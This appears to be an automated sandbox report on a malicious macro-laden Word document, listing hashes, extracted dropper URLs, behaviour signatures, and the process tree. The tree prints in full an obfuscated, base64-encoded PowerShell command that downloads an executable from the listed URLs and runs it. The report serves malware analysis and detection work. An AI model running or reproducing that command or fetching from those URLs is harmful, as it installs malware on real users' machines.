Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    18/08/2024, 16:24

General

  • Target

    a75da0fc938b6d09f556e2d98a52d8d2_JaffaCakes118.doc

  • Size

    170KB

  • MD5

    a75da0fc938b6d09f556e2d98a52d8d2

  • SHA1

    e723c7de3cb4162fe2f54b83a7ba259b51626a27

  • SHA256

    10fe3df8f6540696c8eaf649bc752e30d5533b0203869ec0839cf045227620ba

  • SHA512

    63f2c71bea271eb909d8312275df167e105643f8e53b6386115adbcb41546ac46ffd3b638a1e4976c9d27e219ef4ffc155033d2e9f98c260c0d05ed54f8ce8d7

  • SSDEEP

    1536:sB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5Z+a9gWvrCv3Pt6D8N:s22TWTogk079THcpOu5UZTvw3Pt6D8N

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ckinterbiz.com/backup/waI0rNy/

exe.dropper

http://creationskateboards.com/shred/xnYp2/

exe.dropper

http://bnmintl.com/cgi-bin/hQuB2/

exe.dropper

http://buildingrobots.net/cgi-bin/LKgv/

exe.dropper

http://booksearch.com/index_files/U/

exe.dropper

http://davehale.ca/cgi-bin/v4kax/

exe.dropper

https://www.equiposjj.com/cgi-bin/h0MId/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a75da0fc938b6d09f556e2d98a52d8d2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:564
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
      POWeRsHeLL -ENCOD JABPAHEAaQBkADEAbgB1AD0AKAAoACcAQQA3AHgAJwArACcAdAAnACkAKwAoACcAYgBpACcAKwAnAG0AJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAG4AVgA6AFUAcwBFAHIAUAByAG8ARgBJAGwAZQBcAHoAdwBMADYATQBVAEkAXABvAFYAQwBkAEIAeABzAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABDAGAAVQByAGkAYABUAFkAcAByAE8AVABvAEMATwBsACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAyACcAKwAnACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKwAnADEAJwArACgAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQASQAwADAAMgAwADUAbAAgAD0AIAAoACgAJwBBAGkAJwArACcAcAA0ACcAKQArACgAJwBjAGIAJwArACcANwBwACcAKQApADsAJABUADAANQBqAHYAawB6AD0AKAAnAEsAJwArACgAJwBnAHQAdgAnACsAJwBoAGcAJwApACsAJwB4ACcAKQA7ACQAWgB5ADQAcwBvAGwAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADQAMwBMACcAKwAnAFoAdwBsACcAKQArACcANgBtACcAKwAoACcAdQBpADQAMwAnACsAJwBMACcAKwAnAE8AJwArACcAdgBjAGQAYgB4AHMAJwArACcANAAzACcAKQArACcATAAnACkALgAiAHIAZQBgAHAAbABgAEEAYwBlACIAKAAoAFsAYwBIAEEAcgBdADUAMgArAFsAYwBIAEEAcgBdADUAMQArAFsAYwBIAEEAcgBdADcANgApACwAJwBcACcAKQApACsAJABJADAAMAAyADAANQBsACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABFADUAcQA5AHoAXwBsAD0AKAAnAE4AJwArACgAJwBjACcAKwAnADUAaAAnACkAKwAoACcAMQAnACsAJwByAHQAJwApACkAOwAkAFgAcgB4AGgAMwB0ADcAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAGIAQwBsAEkAZQBOAHQAOwAkAEwAegBoADkAcwBhAF8APQAoACcAaAB0ACcAKwAoACcAdABwACcAKwAnADoAJwApACsAJwAvAC8AJwArACcAYwAnACsAKAAnAGsAaQAnACsAJwBuACcAKwAnAHQAZQByAGIAaQB6ACcAKQArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBiACcAKwAoACcAYQBjAGsAdQBwACcAKwAnAC8AJwArACcAdwAnACkAKwAnAGEASQAnACsAJwAwACcAKwAoACcAcgAnACsAJwBOAHkALwAnACkAKwAoACcAKgBoACcAKwAnAHQAJwApACsAJwB0AHAAJwArACgAJwA6AC8ALwBjAHIAZQAnACsAJwBhAHQAJwApACsAJwBpACcAKwAoACcAbwBuACcAKwAnAHMAJwApACsAKAAnAGsAYQAnACsAJwB0AGUAYgAnACkAKwAoACcAbwAnACsAJwBhAHIAZAAnACkAKwAnAHMAJwArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AcwAnACkAKwAnAGgAJwArACcAcgAnACsAKAAnAGUAZAAvACcAKwAnAHgAbgBZACcAKQArACcAcAAnACsAKAAnADIALwAnACsAJwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwArACcAOgAvACcAKwAnAC8AYgAnACsAJwBuACcAKwAoACcAbQBpACcAKwAnAG4AJwApACsAKAAnAHQAbAAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAGMAZwAnACsAJwBpAC0AYgAnACkAKwAoACcAaQBuAC8AaAAnACsAJwBRACcAKQArACgAJwB1AEIAJwArACcAMgAvACcAKQArACcAKgAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBiAHUAaQAnACsAJwBsAGQAaQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHIAbwBiAG8AdAAnACsAJwBzAC4AbgAnACkAKwAoACcAZQAnACsAJwB0AC8AYwBnACcAKQArACgAJwBpACcAKwAnAC0AYgAnACkAKwAnAGkAJwArACgAJwBuAC8AJwArACcATABLACcAKQArACgAJwBnACcAKwAnAHYALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAJwAvAC8AJwArACgAJwBiAG8AbwAnACsAJwBrACcAKQArACgAJwBzAGUAJwArACcAYQAnACkAKwAoACcAcgBjACcAKwAnAGgALgBjACcAKwAnAG8AbQAnACsAJwAvAGkAbgBkAGUAJwArACcAeABfAGYAJwApACsAKAAnAGkAJwArACcAbABlAHMALwAnACkAKwAnAFUAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACsAJwBkACcAKQArACgAJwBhAHYAZQAnACsAJwBoACcAKQArACcAYQBsACcAKwAoACcAZQAuACcAKwAnAGMAJwApACsAKAAnAGEALwBjAGcAaQAtACcAKwAnAGIAaQBuAC8AdgAnACsAJwA0ACcAKwAnAGsAYQB4AC8AJwArACcAKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcABzADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AJwArACcAZQAnACkAKwAoACcAcQB1AGkAJwArACcAcABvAHMAJwArACcAagBqAC4AYwBvAG0AJwApACsAJwAvAGMAJwArACgAJwBnACcAKwAnAGkALQBiAGkAbgAvAGgAJwArACcAMABNACcAKQArACgAJwBJAGQAJwArACcALwAnACkAKQAuACIAcwBQAGwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABWAHoAMABvADIANwBwAD0AKAAnAFkAYwAnACsAKAAnAHgAYgA1ACcAKwAnADAANQAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEoAbABlAHAAcABvADcAIABpAG4AIAAkAEwAegBoADkAcwBhAF8AKQB7AHQAcgB5AHsAJABYAHIAeABoADMAdAA3AC4AIgBEAG8AYABXAG4AbABPAEEARABgAEYASQBgAGwARQAiACgAJABKAGwAZQBwAHAAbwA3ACwAIAAkAFoAeQA0AHMAbwBsAHkAKQA7ACQAVQAzADcAaABwAHIAMQA9ACgAJwBRACcAKwAnAHUAJwArACgAJwAyAHMAJwArACcAcQByADIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWgB5ADQAcwBvAGwAeQApAC4AIgBMAEUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAOQAwADgAOQApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABaAHkANABzAG8AbAB5ACkAOwAkAFoAMwB0AGkAaQBrAGwAPQAoACcAVwAnACsAKAAnAF8AeAAnACsAJwBtAGsAcQB1ACcAKQApADsAYgByAGUAYQBrADsAJABVAHAAMAB2AGwAZgBtAD0AKAAoACcARQAnACsAJwAyAGgAZgA5ACcAKQArACcAZgByACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBvADYAZwBsADQAdQA9ACgAJwBPACcAKwAoACcANQAnACsAJwB2AHMAJwApACsAKAAnAGQAJwArACcAcABuACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2852

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      b15e722c3995a7a133fb50ab820419a7

      SHA1

      2d012adb2b6041ccb96dfac4657dfd81750961f9

      SHA256

      382fb054a7167135a949ce41cc534f7bac8ee5ad3fe6c85ebff7cdc82ea16f30

      SHA512

      1ebda8b3da384f54a6bf6ad2fe9327a1e934331e3aecccd388a21c3287efd3f466781dbac6794926cda0d283b52dfa2f20253f3ecd9297787a45405f12075266

    • memory/2852-39-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2852-40-0x00000000021D0000-0x00000000021D8000-memory.dmp

      Filesize

      32KB

    • memory/2988-8-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-32-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-7-0x0000000006180000-0x0000000006280000-memory.dmp

      Filesize

      1024KB

    • memory/2988-9-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-22-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-21-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-20-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-19-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-18-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-31-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-16-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-14-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-15-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-13-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-12-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-11-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-10-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-0-0x000000002F681000-0x000000002F682000-memory.dmp

      Filesize

      4KB

    • memory/2988-5-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-33-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-17-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-30-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-29-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-28-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-27-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-26-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-25-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-24-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-23-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-6-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-2-0x0000000070ECD000-0x0000000070ED8000-memory.dmp

      Filesize

      44KB

    • memory/2988-41-0x0000000070ECD000-0x0000000070ED8000-memory.dmp

      Filesize

      44KB

    • memory/2988-43-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-46-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-47-0x00000000007B0000-0x00000000008B0000-memory.dmp

      Filesize

      1024KB

    • memory/2988-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2988-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2988-64-0x0000000070ECD000-0x0000000070ED8000-memory.dmp

      Filesize

      44KB